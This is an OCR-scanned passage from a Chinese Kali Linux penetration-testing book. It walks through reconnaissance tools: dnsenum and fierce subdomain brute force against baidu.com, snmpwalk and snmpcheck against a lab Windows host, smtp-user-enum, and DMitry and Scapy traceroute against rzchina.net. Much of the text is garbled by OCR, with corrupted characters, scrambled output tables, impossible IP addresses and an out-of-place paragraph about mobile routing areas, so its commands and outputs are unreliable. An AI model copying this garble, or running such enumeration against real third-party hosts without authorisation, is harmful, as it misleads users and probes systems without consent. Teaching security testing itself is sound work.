要 使 用 SnmpEnum 工 具 。SnmpEnum 是 一 个 强大 的 SNMP 枚 举 工 具 ， 它 允许 用 户 
分 析 一 一 个 网 络 内 SNMP 信 息 传输 。 


4.1.1 DNS 枚 举 工 具 DNSenum 


DNSenum 是 一 于 非常 强大 的 域名 信息 收集 工具 。 它 能 够 通过 谷歌 或 者 字典 文件 猿 
mA BE 存在 的 域名 ， 并 对 一 个 网 段 进行 反 向 查询 。 它 不 仅 可 以 查询 网 站 的 主机 地 址 
寺 轧 、 域 名 服务 器 和 邮件 交换 记录 ， 还 可 以 在 域名 服务 器 上 执行 axfr 请 求 ， 然 后 通 
过 谷歌 脚本 得 到 扩展 域名 信息 ， 提 取 子 域名 并 查询 ， 最 后 计算 C 类 地 址 并 执行 whois 
查询 ， 执 行 反 向 查询 ， 把 地 址 段 写 入 文件 。 本 小 节 将 介绍 使 用 DNSenum 工 具 检 查 
DNS 榴 举 。 在 终 问 执行 如 下 所 示 的 命 人 : 


root@kali:~# dnsenum --enum benet.com 
dnsenum. Be VERSION:1.2.3 
第 4 章 de BSR 
Warning: can't load Net::Whois::IP module, whois queries disabled. 
----- benet.com ----- 
Host's addresses: 


benet.com. 86400 IN A 19; 
benet.com. 86400 IN A 12 
Name Servers: 


benet.com. 86400 IN A T2 
benet.com. 86400 IN A 19: 
www.benet.com. 86400 IN A 192 
Mail (MX) Servers: 

mail.benet.com. 86400 IN A 192 


Trying Zone Transfers and getting Bind Versions: 
Ee 


人 出 的 信息 显示 了 DNS 服务 的 详细 信息 。 其 中 ， 包 括 主 机 地 址 、 域 名 服务 地 址 和 地 
件 服务 地 址 。 如 果 季 运 的 话 ， 还 可 以 看 到 一 个 区 域 传 输 。 


使 用 DNSenum 工 具 检 查 DNS 枚 举 时 ， 可 以 使 用 dnsenum 的 一 些 附 加 选项 ， 如 下 所 
示 。 





e --threads [number] : 设置 用 户 同 时 运行 多 个 进程 数 。 
e -r : 多 许 用 户 启用 递归 查询 。 
e -d : 人 允许 用 户 设置 WHOIS 请 求 之 间 时 间 延 迟 效 〈 单 位 为 秒 ) 。 


e -0 : 人 允许 用 户 指定 输出 位 置 。 
e -w: 人 允许 用 户 启 用 WHOIS 请 求 。 


4.1.2 DNS 枚 举 工 具 fierce 


fierce 工 具 和 DNSenum 工 具 
言 息 的 。 使 用 fierce 工 具 获 取 一 


PAAR : 


IM AAS, EHfiercex: E 
个 目标 主机 上 所 有 IP 地 址 和 主机 信息 。 执 行 命 


root@kali:~# fierce -dns baidu.com 


DNS Servers 
ns2. 
ns7. 
dns. 
ns3. 
ns4. 


for baidu.com: 


baidu.com 
baidu.com 
baidu.com 
baidu.com 
baidu.com 


Trying zone transfer first.. 


Testing 
Testing 
Testing 
Testing 


Testing 


ns2.baidu.com 
Request timed 
ns7.baidu.com 
Request timed 
dns.baidu.com 
Request timed 
ns3.baidu.com 
Request timed 
ns4.baidu.com 
Request timed 


out 


out 


out 


out 


out 


Or 


Or 


Or 


Or 


Or 


transfer 


transfer 


transfer 


transfer 


transfer 


是 对 子 域名 进 


not 


not 


not 


not 


not 


Unsuccessful in zone transfer 


(it 


was worth a shot 


allowed. 


allowed. 


allowed. 


allowed. 


allowed. 


) 


Okay, trying the good old fashioned way... brute force 
Checking for wildcard DNS... 
** Found 94050052936.baidu.com at 123.125.81.12. 
** High probability of wildcard DNS. 
Now performing 2280 test(s)... 
10.11.252.74 accounts.baidu.com 
172.22.15.16 agent.baidu.com 


180.76.3.56 antivirus.baidu.com 
ba.baidu.com 
u. 
u. 
u. 
S. 


10.81.7.51 
172.18.100.200bd.baid 
10.36.155.42 bh.baid 
10.36.160.22 bh.baid 
10.11.252.74 account 
me 省 略 部 分 内 容 
61.135.163.0-255 
61.135.165.0-255 
61.135.166.0-255 
ST 135 185707255 
Done with Fierce scan: 
Found 133 entries. 
Have a nice day. 


BEEBE 


com 
com 
com 
baidu.com 


hostnames 
hostnames 
hostnames 
hostnames 


http://ha. 


found. 
found. 
found. 
found. 
ckers.org/fierce/ 


进行 打 描 和 收集 
DU F 


输出 的 信息 显示 了 baidu.com 下 所 有 的 子 域 。 从 倒数 第 2 行 ， 可 以 看 到 总 共 找 到 133 
个 条 目 。 执 行 以 上 命 合 后 ， 输 出 的 内 容 较 多 。 但 是 由 于 和 骗 幅 的 原因 ， 部 分 内 容 使 用 
BRS (...... ) 取代 。 


用 户 也 可 以 通过 提供 一 个 单词 列表 执行 相同 的 操作 ， 执 行 命 分 如 下 所 示 : 


root@kali:~# fierce -dns baidu.com -wordlist hosts.txt /tmp/output 


LN; "g 





4.1.3 SNMP% T ESnmpwalk 


Snmpwalk 是 一 个 SNMP 应 用 程序 。 它 使 用 SNMP 的 GETNEXT 请 求 ， 查 询 指定 的 所 
有 OID (SNMP 协 议 中 的 对 象 标 识 ) 树 信 息 ， 并 显示 给 用 户 。 本 小 节 将 演示 
Snmpwalk 工 具 的 使 用 。 


【实例 4-1】 使 用 Snmpwalk 命 命 测 试 Windows 主 机 。 执 行 命 爷 如 下 所 示 : 


root@kal 
Lso.3. 
İSO. 
İSO. 
1SO. 
İSO. 
1SO. 
İSO. 
İSO. 
1SO. 
İSO. 


1SO 


WWWWWWWWWWW CO CO 
Oo00000000000 Oo 


WWW CO 


6. 


qs 


HHÁBbBHBHHBHHHBHHBHHIHAH 


BRE RB 


MNNNNNNDNNNNN DN ON 


-V 2C 


STRING: "Hardware: x86 Family 6 Model 42 Ste; 


el sq 


14 77 61 72 65 20 Al 


20 4D 69 6E 69 70 6f 


20 4D 69 6E 69 70 6f 


~# snmpwalk -c public 192.168.41.138 
fd oe Oe 
1.1.2.0 = OID: 1s0.3.6.1.4.1.311.1 
1.1.3.0 = Timeticks: (49046) 0:08:10.46 
1.1.4.0 一 n n 
1.1.5.0 = STRING: "WIN-RKPKQFBLG6C" 
1.1.6.0 一 Wel 
1.1.7.0 = INTEGER: 76 
1.2.1.0 = INTEGER: 19 
1.2.2.1.1.1 = INTEGER: 1 
1.2.2.1.1.2 = INTEGER: 2 
1.2.2.1.1.3 = INTEGER: 3 
1.2.2.1.1.4 = INTEGER: 4 
1.2.2.1.1.5 = INTEGER: 5 
1.2.2.1.1.6 = INTEGER: 6 
1.2.2.1.1.16 = INTEGER: 16 
1.2.2.1.1.17/7 = INTEGER: 17 
1.2.2.1.1.18 = INTEGER: 18 
1.2.2.1.1.19 = INTEGER: 19 
1.2.2.1.2.1 = Hex-STRING: 53 6F 66 
74 65 72 66 61 63 65 20 31 00 
.1.2.2.1.2.2 = Hex-STRING: 57 41 4E 
.1.2.2.1.2.3 = Hex-STRING: 5/7 41 4E 
1.2.2.1.2.4 = Hex-STRING: 5/7 41 4E 


pio 16:254.129:0-0.00 


Gauge32: 9 
.0 = Counter32: 0 


Sd 162294. 28:.05050.0: 
S12 16. 254-128-000 .0- 
9: 13.16.32.10 0157.56. 
5 


20 AD 69 6E 69 70 6f 


0.0. 149.194.132.179 
0707070794254192: 
106.184.52.243.8.98 
,0.0.52.243.8.98.63.t 





以 上 输出 的 信息 显示 了 Windows 主 机 192.168.41.138 上 的 所 有 信息 。 
用 户 也 可 以 使 用 nmpwalk 命 令 枚 举 安 委 的 软件 。 执 行 命令 如 下 所 示 : 


root@kali:~# snmpwalk -c public 192.168.41.138 -v 1 | grep ftp 


180.3.6.1.2.1.25.4.2.1.5.3604 = STRING: "-k ftpsvc" 


输出 的 信息 表示 192.168.41.138 主 机 安装 了 ftp 软 件 包 。 


使 用 Snmpwalk 工 具 也 可 以 枚 举目 标 主 机 上 打开 的 TCP 靖 口 。 执 行 命令 如 下 所 示 : 


root@kali:~# snmpwalk -c public 192.168.41.138 -v 1 | grep tcpConn: 
21 
25 
80 
443 


Eei 


ia Oa A T 192.168.41.138EALH Amo. 4021, 25. 8070443, ZATTF 
了 4 个 靖 口 号 。 





4.1.4 SNMP 枚 举 工 具 Snmpcheck 


Snmpcheck 工 具 人 允许 用 户 枚 举 SNMP 设 各 的 同时 将 结果 以 可 读 的 方式 输出 。 下 面 将 
演示 该 工具 的 使 用 。 使 用 Snmpcheck 工 具 通过 SNMP 协 议 获取 192.168.41.138 主 机 
信息 。 执行 命令 如 下 所 示 i 


root@kali:~# snmpcheck -t 192.168.41.138 


该 命令 输出 信息 较 多 ， 下 面 依次 讲解 每 个 邵 分 。 首 先 输出 的 是 枚 举 运行 信息 。 
snmpcheck.pl v1.8 - SNMP enumerator 
Copyright (c) 2005-2011 by Matteo Cantoni (www.nothink.org) 
[*] Try to connect to 192.168.41.138 


[*] Connected to 192.168.41.138 
[*] Starting enumeration at 2014-04-19 15:28:58 


(1) 获取 系统 信息 ， 如 主机 名 、 操 作 系统 类 型 及 以 构 。 结 果 如 下 所 示 : 
[*] System information 


Hostname : WIN-RKPKOFBLG6C # 主 机 名 

Description : Hardware: x86 Family 6 Model 42 Stepping 7 AT/AT COMPATIBLE - 
Software: Windows Version 6.1 (Build 7601 Multiprocessor Free) — 4H&ibt[5 8 

Uptime system : 6 hours, 29:56.09 # 目 前 系统 开机 运行 时 间 

Uptime SNMP daemon : 25 minutes, 56.65 #SNMP 进程 运行 时 间 

Motd := 

Domain (NT) : WORKGROUP # 计 算 机 隶属 于 


从 输出 的 信息 中 可 以 看 到 该 系统 的 主机 名 为 WIN-RKPKQFBLG6C、x86 架 构 和 
Windows 系 统 等 信息 。 


(2) 获取 设备 信息 ， 如 设备 ID 号 、 类 型 和 状态 等 。 结 果 如 下 所 示 : 


[*] Dewices information 


Id Type Status Description 


1 Printer Running TP Output Gateway 
10 Network Unknown WAN Miniport (L2TP) 
11 Network Unknown WAN Miniport (PPTP) 
12 Network Unknown WAN Miniport (PPPOE) 
6 Printer Running Microsoft Shared Fax Driver 
T Processor Running intel 
8 Network Unknown Software Loopback Interface 1 
9 Network Unknown WAN Miniport (SSTP) 


以 上 信息 显示 了 该 系统 中 所 有 设 各 相 天 信息 ， 如 打印 设备 、 网 络 设备 和 义理 器 等 。 
(3) 获取 存储 信息 ， 如 设备 id、 设 各 类 型 和 文件 系统 类 型 寺 。 结 果 如 下 所 示 : 


[*] Storage information 


Device id 1 meg s ID 

Device type : Removable Disk # 设 备 类 型 

Filesystem type ; Unknown BY TER EAE RI 
CA Label: Serial Number 3814cb70 

Device id :2 

Device type : Fixed Disk 

Filesystem type : NTFS 

Device units : 4096 # 设 备 单元 

Memory size : 111G # 空 间 大 小 

Memory used : 8.5G 2E S RI s IS) 

Memory free : 102G Hal Sz E |B) 


Ox443a5c204c6 16265bc3ad0c2bcd3beed20205365 72696 16c204e /56d6265/2206261346437062 
3134 


Device id roe 

Device type : Fixed Disk 

Filesystem type : NTFS 

Device units : A096 

Memory size : 98.8G 

Memory used : 79M 

Memory free .98.7G 
üx453a5c204c6162656c3adÜc2bcd3beed202053657268616c204e756062657220343234383837 
6331 

Device id - 4 

Device type : Fixed Disk 

Filesystem type : NTFS 

Device units : 4096 

Memory size : 9.86 

Memory used : 78M 

Memory free : 9.7G 

ABBA Xm IM IBARA, ix E E35 f AMC & Br HIER. 


HC SD St 28 In dS. 包括 设 备 类 型 、 文 件 系 统 类 型 、 空 间 大 
小 、 已 用 空间 大 小 剩余 空间 大 小 等 


(4) 获取 用 户 账户 信息 。 结 果 如 下 所 示 : 


[^] User accounts 


Administrator 
Guest 


输出 的 信息 显示 了 该 系统 中 的 有 两 个 用 户 ， 分 别 是 Administrator 和 Guest。 
(5) 获取 进程 信息 ， 如 进程 ID、 进 程 名 和 进程 类 型 等 。 结 果 如 下 所 示 : 
[+] Processes 


Total processes: 44 


Process type : 1 unknown, 2 operating system, 3 device driver, 4 application 
Process status: 1 running, 2 runnable, 3 not runnable, 4 invalid 
Process id Process name Process type Process status Process path 
1 System Idle Process 2 1 
1112 svchost.exe 4 1 
1276 spoolsv.exe 4 1 
1324 svchost.exe 4 1 
1416 taskhost. exe 4 1 


输出 信息 的 第 一 行 表示 该 系统 中 共有 44 个 进程 。 由 于 篇 幅 的 原因 ， 这 里 只 列 出 了 前 
几 个 运行 的 进程 。 第 二 行 指 定 了 进程 类 型 : 1 表示 不 知名 ; 2 表示 操作 系统 ; 3 表示 
设备 驱动 ; 4 表示 应 用 程序 。 第 三 行 指定 了 进程 的 状态 : 1 表示 正在 运行 ; 2 表示 可 
以 运行 ; 3 表示 不 能 运行 ; 4 表示 无 效 的 。 第 四 和 了 的 内 容 是 以 列 的 形式 显示 : : 第 一 列 

表示 进程 ID ; 第 二 列表 示 进 程 名 ; 第 三 列表 示 进 程 状态 ; 第 四 列表 示 进 程 路 径 。 


(6) 获取 网 络 信息 ， 如 TTL 值 、TCP 段 和 数据 元 。 结 果 如 下 所 示 : 
[*] Network information 


TERTE UB GE EP mc rT mt ut tÉÁ E Ru ut EP ECT EP CUR EMO RUM UE HEIKE EDU EC EUR E T Emo cut Etc PER UEBER ut c ER E ut E aT ae aU NE E eee Et 


IP forwarding enabled : no BEES mamHIPi$x 
Default TTL : 128 88EII TTL 值 
TCP segments received : 19092 # 收 到 TCP FG 
TCP segments sent : 5964 # 发 送 TCP fi 
TCP segments retrans. :0 # 重 发 TCP 段 
Input datagrams : 37878 # 输 入 数据 元 
Delivered datagrams : 38486 # 传 输 的 数据 元 
Dutput datagrams : 16505 # 输 出 数据 元 


以 上 信息 显示 了 该 目标 系统 中 网 络 的 相关 信息 ， 如 默认 TTL 值 、 收 到 TCP 段 、 发 送 
TCP 段 和 重 发 TCP 段 等 。 


(7) 获取 网 络 接口 信息 ， 如 接口 状态 、 速 率 、IP 地 址 和 子 网 扼 码 等 。 结 果 如 下 所 
7 : 
[*] Network interfaces 


Interface : [up ] Software Loopback interfaca. 1 

Interface Speed : 1073.741824 Mbps He Dm x 
IP Address : 127.0.0.1 #IP 地 址 
Netmask : 255.0.0.0 #T p fend 


MTU : 1500 # 最 太 传 输 单 元 


以 上 信息 中 显示 了 loopback 接 口 的 相关 信息 。 包 括 它 的 速 


束 率 、|IP 地 址 、 子 网 掩 码 和 


最 大 传输 Y Jie 
(8) 获取 路 由 信息 ， 如 目标 地 址 、 下 一 跳 地 址 、 子 网 掩 码 和 路 径 长 度 值 。 结 果 如 
RATA : 
[+] Routing information 
Destination NextHop | Mask si Metric 0 
0.0.0.0 192.168.41.2 0.0.0.0 10 
127.0.0.1 127.0.0.1 255.255.255.255 306 
127.255.255.255 127.0.0.1 255.255.255.255 306 
192.168.41.0 192.168.471.138 200.299.299.0 266 
192.168.41.138 192.168.41.138 255.255.255.255 266 
192.168.41.255 192.168.41.138 255.255.255.255 266 
224.0.0.0 127.0.0.1 240.0.0.0 306 
以 上 信息 表示 目标 系统 的 一 个 路 由 表 信 息 。 该 路 由 表 包 括 目的 地 址 、 下 一 跳 地 址 、 
FARAR CE K EE 
(9) 获取 网 络 服务 信息 ， 如 分 布 陈 组 件 对 象 模型 服务 、DHCP 客 户 痕 和 DNS 客户 
Una. 2 SR U0 RATE : 


[+] Network services 


EERTE TTE ae ee ae ee ee ee ee eee Ee a ee ae ee ae EN UN NP ee ae ee ee ee a a aE ee Een ee 


Application Experience 
Background Intelligent Transfer Service 
Base Filtering Engine 
COM+ Event System 
COM+ System Application 
Computer Browser 


Cryptographic Services 


DCOM Server Process Launcher 
DHCP Client 
DNS Client 


以 上 信息 显 


(10) à 
EE 


[*] Listening TCP ports and connections 


示 了 目标 主机 中 所 安 


妆 的 服务 。 由 于 篇 幅 的 原因 ， 


只 列 出 了 一 


一 少 部 分 服 


又 监听 的 TCP 痛 口 ， 如 监听 的 TCP 冰 口 号 有 135、495149513 和 139 等 。 


Local Address 


0.0.0.0 
0.0.0.0 
0.0.0.0 
0.0.0.0 
0.0.0.0 
0.0.0.0 
0.0.0.0 


182.168.41.138 
192.168.41.138 


Port Remote Address Port 
135 0.0.0.0 
49152 0.0.0.0 - 
49153 0.0.0.0 - 
49154 0.0.0.0 
49155 0.0.0.0 
49156 0.0.0.0 - 
49159 0.0.0.0 - 
139 0.0.0.0 - 
49241 192.168.41.1 139 


Listening 
Listening 
Listening 
Listening 
Listening 
Listening 
Listening 
Listening 
Time wait 


AD ggg 后 的 信息 。 包 插 本 地 地 址 、 本 机 痛 口 、 远 程 主 
机 地 址 、 远 程 主机 闯 口 及 连接 状态 


(11) 获取 监听 UDP 世 口 信息 ， 如 监听 的 UDP 端口 有 123、161、4500、500 和 
5355 等 。， 结果 如 下 所 示 : 


[+] Listening UDP pons 


Local Address Port 
0.0.0.0 123 

0.0.0.0 161 

0.0.0.0 4500 

0.0.0.0 500 

0.0.0.0 5355 
127.0.0.1 1900 
127.0.0.1 51030 
192.168.41.138 137 
192.168.41.138 138 
192.168.41.138 1900 


以 上 信息 表示 目标 主机 中 已 开局 的 UDP 新 口号。 
(12) 获取 软件 组 件 信 息 ， 如 Visual C++ 2008。 显 示 结 果 如 下 所 示 : 


[+] Software components 


1. Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 
DLE E ZR AZEN ARE T Visual C++ 2008 X €, 


(13) 获取 Web 服 务 信 息 ， 如 发 送 的 字 节 数 、 文 件数 和 当前 匿名 用 户 等 。 结 果 如 下 
所 示 : 


[+] Web server information 


Total bytes sent low word - 
Total bytes received low word = 
Total files sent m 
Current anonymous users = 
Current non anonymous users - 
Total anonymous users = 
Total non anonymous users - 


[+] Enumerated 192.168.41.138 in 0.64 seconds 
signal USR1 received in thread 1, but no signal handler set. at /usr/bin/snmpcheck line 230. 


以 上 信息 显示 了 关于 Web 服 务 的 信息 。 最 后 显示 了 榴 举 主机 192.168.41.138 共 用 的 
时 间 。 


4.1.5 SMTP 枚 举 工具 smtp-user-enum 


smtp-user-enum 是 针对 SMTP 服 务 器 的 25 端 口 ， 进 行 用 户 名 枚 举 的 工具 ， 用 以 探测 
服务 器 已 存在 的 邮箱 峰 户 。 在 SMTP 服 务 上 局 oR > 的 SMTP 枚 举 。 执 行 命令 如 下 
ATR : 


root@kali:~# smtp-user-enum -M VRF'Y -U /tImp/users.txt -t 192.168.471.138 
Starting smtp-user-enum v1.2 m /ipentestmonkey. eR Ol STE Uparan m ) 


| scan romalo | 


Fem ma eS am DEM UNA mS mm GR MM AR ORAN GM REA ee ee ee ee ee ee Ee MOREM GN MR am DAR GR ORA AM RR ORA MR Rm DER ORAS RR SR ORNA RR cR m UEM cA Ga RR Ra Gam am ORA S OR s ms c Rm ms Rc m 





Moda ................. 7 . VRFY SSMTP 核 举 使 用 的 模式 
Worker Processes ... — 1... 5 # 运 行进 程 数 
Usernames file ........... /tmp/users. txt du ECT: 
Target count ......... T "E tK PSI 
Username count .... IT. # 用 户 名 账号 数 
Target TCP port... am 25 #8 te TCP 端口 
Query timeout ...... nee 5 secs # 超 时 时 间 
Target domain ............ # 目 标 域名 
th Scan Saied at Sat Apr 19 16:07:04 2014 THERERHEHHI # 扫 描 启 动 时 间 
THEHHBHHE Scan completed at Sat Apr 19 16:07:05 2014 fHEBHEHEHE # 扫 描 结束 时 间 
0 results. 


2 queries in 1 seconds (2.0 queries / sec) 


fà EHE A m T 1218192.168. 41.138 主 机 的 详细 信息 ， 包 插 模 式 、 运 行进 程 、 用 
PAM A PSUNITCPSRS EISE, 


4.2 测试 网 络 泄 转 


测试 网 22 5p B8] A BAJIP HR E S 3a 2 t3 26:2 sh 试 的 一 个 重要 部 分 。 Ji: Jit 30] 3x PAZ 各 DG BI 
内 的 IP 地 址 或 域名 ， 确 定 是 否 有 人 人 侵 目 己 的 网 5 h3E i KOR. 个 少 单位 选择 仅 
对 局 部 IP 基 础 架构 进行 渗透 测试 ， EARENREKIRE, RANE 个 IT 基础 架 

We oe ee ae me ABP SISA, m 
可 以 利用 这 个 漏洞 攻击 另外 一 个 领域 。 人 了 DMitry 和 Scapy 工 具 。 其 中 ， 
DMiT RASK 20 BP $ 中 |P 地 址 或 域名 信息 ; Scapy 工 具 3 FH sk q3 fi Dod 25 KIR 
探 数 据 包 。 本 节 将 介 绍 使 用 DMitry 和 Scapy 工 具 3m xp: E. 


4.2.1 域名 查询 工具 DMitry 


DMitry 工 具 是 用 来 查询 IP 或 域名 WHOIS 信 息 的 。WHOIS 是 用 来 查询 域名 是 

被 注册 及 已 经 注册 域名 的 详细 信息 的 数据 库 (如 域名 所 有 人 和 域名 当 E p 
该 工具 可 以 查 到 域名 的 注册 两 和 过 期 时 间 等 。 下 面料 使 用 DMitry 工 具 收 集 
rzchina.net 域 名 的 信息 。 执 行 命 倒 如 下 所 示 : 


root@kali:~# dmitry -wnpb rzchina.net 
Deepmagic Information Gathering Tool 
"There be some deep magic going on" 
HostIP:180.178.45.123 
HostName:rzchina.net 
Gathered Inic-whois information for rzchina.net 
Domain Name: RZCHINA.NET 
Registrar: BIZCN.COM, INC. 
Whois Server: whois.bizcn.com 
Referral URL: http://www.bizcn.com 
Name Server: DHS1.BIZMOTO.COM 
Name Server: DNHS2.BIZMOTO.COM 
Status: clientDeleteProhibited 
status: client TransferProhibited 
Updated Date: 18-apr-2013 


Retrieving Metcraft.com information for rzchina.net 
Netcraft.com Information gathered 


Gathered TCP Port information for 180.178.45.123 


Port State 
21/tcp open 
>> 220 Welcome 
22/tcp open 
>> SSH-2.0-OpenSSH 4.3 
29/tcp open 
>> 220 vhost78.myverydz.com ESMTP Postfix 
BÜ/tcp open 
110/tcp open 


>> +OK Hello there. 
Portscan Finished: Scanned 150 ports, 135 ports were in state closed 
All scans completed, exiting 


输出 的 信息 显示 了 rzchina.net 域 名 的 IP 地 址 、WHOIS 信 息 及 开放 的 端口 号 等 。 执 行 
ketm i 出 的 信息 很 多 ， 但 是 由 于 篇 幅 的 原因 ， 部 分 内 容 使 用 省 略 号 C... ) 
RE. 


虽然 使 用 DMitry 工 具 可 以 查看 到 IP 或 域名 信息 ， 但 还 是 不 能 判断 出 这 个 网 络 范 围 。 
因为 一 般 的 路 由 器 和 防火 墙 等 并 不 支持 IP 地 址 范围 的 方式 ， 所 以 工作 中 经 常 要 把 IP 
地 址 转换 成 子 网 掩 码 的 格式 、CIDR 格 式 和 思科 反 向 子 网 掩 码 格式 等 。 在 Linux 中 ， 
netmask 工 具 可 以 在 IP 范 围 、 子 网 掩 码 、CIDR 和 Cisco 等 格式 中 互相 转换 ， 并 且 提 
供 了 IP 地 址 的 点 分 十 进 制 、 十 六 进 制 、 八 进 制 和 二 进 制 之 间 的 互相 转换 。 使 用 

netmask 工 具 将 域名 rzchina.net 转 换 成 标准 的 子 网 掩 码 格 式 。 执 行 命 合 如 下 所 示 : 


root@kali:~# netmask -s rzchina.net 
180.178.45.123/255.255.255.255 


ia HAS BE zm T rzchina.netis dz AYIP Hb tit RTL F pod 3 23 o 


4.2.2 跟 路 路 由 工具 Scapy 


Scapy 是 一 款 强 大 的 交互 式 数 据 包 处 理工 具 、 数 据 包 生成 器 、 网 络 打 描 器 、 网 络 发 
现 工 具 和 包 嗅 探 工 具 。 它 提供 多 种 类 别 的 交互 式 生 成 数据 包 或 数据 包 集 合 、 对 数据 
包 进 行 操 作 、 发 送 数据 包 、 包 嗅 探 、 应 答 和 反馈 匹配 等 功能 。 下 面 将 介绍 Scapy 工 
具 的 使 用 。 

使 用 Scapy 实 现 多 行 并 行 跟踪 路 由 功能 。 具 体操 作 步 又 如 下 所 示 。 


(1) 启动 Scapy 工 具 。 执 行 命 仿 如 下 所 示 。 


root@kali:~# scapy 
INFO: Can't import python gnuplot wrapper . Won't be able to plot. 


WARNING: No route found for IPv6 destination :: (no default route? 
Welcome to Scapy (2.2.0) 
>>> 


a] EE | 
看 到 >>> 提 示 符 ， 表 示 scapy 命 命 登录 成 功 。 


(2) 使 用 sr() 范 数 实现 发 送 和 接收 数据 包 。 执 行 命 分 如 下 所 示 : 


>>> ans, unans=sr(IP(dst="www.rzchina.net/30", ttl=(1,6))/TCP()) 
Begin emission: 

.****FEinished to send 24 packets. 

— d cd x I | E eua e in 


Received 70 packets, got 19 answers, remaining 5 packets 


执行 以 上 命令 后 ， 会 自动 与 www.rzchina.net 建 立 连接 。 执 行 几 分 钟 后 ， 使 用 Ctrl+C 
终止 接收 数据 包 。 从 输出 的 信息 中 可 以 看 到 收 到 70 个 数据 包 ， 得 到 19 个 响应 包 及 保 
留 了 5 个 包 。 


(3) 以 胡 的 形 陈 查看 数据 包 发 送 情况 。 执 行 命令 如 下 所 示 : 


>>> ans.make table(lambda(s,r):(s.dst,s.ttl,r.src)) 


执行 以 上 命令 后 ， 输 出 如 下 所 示 的 信息 : 


180.178.45.120 180.178.45.121 180.178.45.122 180.178.45.123 
1 192.168.41.2 192.168.41.2 192.168.41.2 192.168.41.2 


2 180.178.45.120 - 180.178.45.122 180.178.45.123 
3 180.178.45.120 - 180.178.45.122 180.178.45.123 
4 180.178.45.120 - 180.178.45.122 180.178.45.123 
5 180.178.45.120 - 180.178.45.122 180.178.45.123 
6 180.178.45.120 - 180.178.45.122 180.178.45.123 


输出 的 信息 显示 了 该 网 络 中 的 所 有 IP 地 址 。 
(4) 使 用 scapy 查 看 TCP 路 由 跟踪 信息 。 执 行 命 合 如 下 所 示 : 


2 
res,unans=traceroute( www.google.com" “www. Kali.org" “www. rzchina.net"],dport=(80,443), maxt 


tl=20 retry=-2) 
Begin emission: 
FES CEEEEETEEEE ES ESE EEES EE ESES ESE SEES ee Finished to send 120 packets. 


i aa a abe aha ahe ah ak ak a ahak a a a a aa aa aha ahe ah ak ok ak ak ah ak a a a a oi i a «Begin emission: 


* Finished to send 39 packets. 


Begin emission: 
Finished to send 38 packets. 
Begin emission: 
Finished to send 38 packets. 
Received 84 packets, qot 82 answers, remaining 38 packets 


173.194.127.179:tcp443 
180.178.45.123-tcp80 198.58.118.164:tcp443 198.58.119.164-tcp80 


173.194.127.179:tcp80 


180.178.45.123:tcp443 


1  192.168.41.2 11 192.168.41.2 11 192.168.41.2 11 
192.168.41.2 11 192.168.41.2 11 192.168.41.2 11 
2 - - 180.178.45.123 RA 
180.178.45.123 SA 198.538.119.164 RA 198.58.119.164 SA 
3 - - 180.178.45.123 RA 
180.178.45.123 SA 188.58.119.164 RA 198.958.119.164 SA 
4 - - 180.178.45.123 RA 
180.178.45.123 SA 198.58.119.164 RA 198.568.119.164 SA 
5 - - 180.178.45.123 RA 
180.178.45.123 SA 1988.58.119.164 RA 198.58.119.164 SA 
6 - - 180.178.45.123 RA 
180.178.45.123 SA 198.58.119.164 RA 198.586.119.164 SA 
T - - 180.178.45.123 RA 
180.178.45.123 SA 188.58.119.164 RA 198.58.119.164 SA 
8 - - 180.178.45.123 RA 
180.178.45.123 SA 188.58.119.164 RA 198.58.119.164 SA 
9 s z 180.178.45.123 RA 
180.178.45.123 SA 198.58.119.164 RA 198.58.119.164 SA 
10 - - 180.178.45.123 RA 
180.178.45.123 SA 1988.58.119.164 RA 198.58.119.164 SA 
11 - - 180.178.45.123 RA 
180.178.45.123 SA 188.58.119.164 RA 198.958.119.164 SA 
12 - - 180.178.45.123 RA 
180.178.45.123 SA 188.58.119.164 RA 198.58.119.164 SA 
13 - - 180.178.45.123 RA 
180.178.45.123 SA 188.58.119.164 RA 198.58.119.164 SA 
14 = - 180.178.45.123 RA 
180.178.45.123 SA 188.58.119.164 RA 188.58.119.164 SA 
15 - - 180.178.45.123 RA 
180.178.45.123 SA 188.58.119.164 RA 198.58.119.164 SA 
16 - - 180.178.45.123 RA 
180.178.45.123 SA 188.58.119.164 RA 198.58.119.164 SA 
17 = = 180.178.45.123 RA 
180.178.45.123 SA 188.58.119.164 RA 198.958.119.164 SA 
18 - - 180.178.45.123 RA 
180.178.45.123 SA 188.58.119.164 RA 198.58.119.164 SA 
18 - - 180.178.45.123 RA 
180.178.45.123 SA 188.58.119.164 RA 198.58.119.164 SA 
20 - - 180.178.45.123 RA 
180.178.45.123 SA 198.58.119.164 RA 198.586.119.164 SA 


at Bg SR, E7 -5www.google.com, www.kali.org. www.rzchina.net-— ^ P] 

站 连接 后 所 经 过 的 地 址 。 输 出 信息 中 的 RA 表示 路 由 区 ，SA 表 示 服 务 区 。 其 中 路 由 

区 是 指 当前 系统 中 移动 台 当 前 的 位 置 。RA (Routing Area) 的 标识 符 是 RAI，RA 是 
包含 在 LA 内 的 。 服 务 区 是 指 移 动 台 可 获得 服务 的 区 域 ， 即 不 同 通信 网 用 户 无 需 知 道 
移动 台 的 实际 位 置 ， 而 可 与 之 通信 的 区 域 。 


(5) 使 用 res.graph() 落 数 以 图 的 形式 显示 路 由 跟 路 结果 。 执 行 命 爷 如 下 所 示 : 


>>> res.graph() 


执行 以 上 全 分 后 ， 将 显示 如 图 4.1 所 示 的 界面 。 


ImageMagick: = 


= zu i a; 一 一 
x "a x 5 - 
INETSEC E Umit 195-9 1 NGL - Coogi lae. US LET UTER - Soh Lape Technol he. L5 











图 4.1 路 由 跟踪 图 
如 果 要 想 保存 该 图 ， 执 行 如 下 所 示 的 命令 : 


>>> res.graph(target=">/tmp/graph.svg" ) 


执行 以 上 命令 后 ， 图 4.1 中 的 信息 将 会 保存 到 /tmp/graph.svg 文 件 中 。 此 时 不 会 有 任 
何 信息 输出 。 


(6) 退出 scapy 程 序 ， 执 行 命 例如 下 所 示 : 


>>> exit() 


执行 以 上 命令 后 ，scapy 程 序 将 退出 。 还 可 以 按 下 Ctrl+D 组 合 键 退 出 scapy 程 序 。 


4.3 识别 活跃 的 主机 


党 斌 渗透 测试 之 前 ， 必 须 先 识别 在 这 个 目标 网 络 内 活路 的 主机 。 在 一 个 目标 网 络 
内 ， 最 简单 的 方法 将 是 执行 ping 命 爷 。 当 然 ， 它 可 能 被 一 个 主机 拒绝 ， 也 可 能 被 接 
收 。 本 节 将 介绍 使 用 Nmap 工 具 识 别 活 路 的 主机 。 


4.3.1 网 络 映射 器 工具 Nmap 


